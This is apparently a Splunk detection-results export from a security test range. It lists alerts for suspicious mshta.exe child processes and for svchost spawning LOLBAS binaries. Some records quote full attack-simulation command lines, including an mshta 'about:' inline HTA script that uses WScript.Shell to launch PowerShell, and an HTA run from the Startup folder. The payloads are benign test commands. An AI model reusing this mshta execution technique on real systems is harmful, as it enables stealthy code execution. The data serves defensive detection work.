risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="C:\\Windows\\System32\\mshta.exe", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:49", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:49", parent_process="C:\\Windows\\SysWOW64\\mshta.exe", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b6756848-4f3a-4e72-b40d-067fc54b3646; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="C:\\Windows\\SysWOW64\\mshta.exe", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:49", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:49", parent_process="C:\\Windows\\SysWOW64\\mshta.exe", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b6756848-4f3a-4e72-b40d-067fc54b3646; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="C:\\Windows\\SysWOW64\\mshta.exe", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();&lt;/script&gt;'\"", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host 23aa97c3-2d1e-46ec-a7aa-b62426241201; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();&lt;/script&gt;'\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();&lt;/script&gt;'\"", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host 23aa97c3-2d1e-46ec-a7aa-b62426241201; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();&lt;/script&gt;'\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:01", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:01", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"\\\\WIN-HOST-MHAAG-\\C$\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\"", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host d3515e72-d751-42bd-854d-643ea9968afe; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\system32\\mshta.exe\" \"\\\\WIN-HOST-MHAAG-\\C$\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:01", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:01", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"\\\\WIN-HOST-MHAAG-\\C$\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\"", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host d3515e72-d751-42bd-854d-643ea9968afe; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\system32\\mshta.exe\" \"\\\\WIN-HOST-MHAAG-\\C$\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_name="cmd.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_name="cmd.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:49", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:49", parent_process="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b6756848-4f3a-4e72-b40d-067fc54b3646; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", threat_object_type="process name", user="Administrator"
1657739679, search_name="ESCU - Suspicious mshta child process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 50, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"parent_process\", \"role\": [\"Parent Process\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:49", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:49", parent_process="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -Command Write-Host b6756848-4f3a-4e72-b40d-067fc54b3646; Start-Sleep -Seconds 2; exit", process_name="powershell.exe", risk_message="suspicious mshta child process detected on host win-host-mhaag-attack-range-117 by user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="40.0", savedsearch_description="The following analytic identifies child processes spawning from  \"mshta.exe\". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process \"mshta.exe\" and its child process.", threat_object="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", threat_object_type="process name", user="Administrator"
1657734181, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T16:37:50", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T16:37:50", parent_process="unknown", parent_process_id="736", process="unknown", process_id="6036", process_name="atbroker.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657662180, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-12T20:26:14", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-12T20:26:14", parent_process="unknown", parent_process_id="736", process="unknown", process_id="6124", process_name="atbroker.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"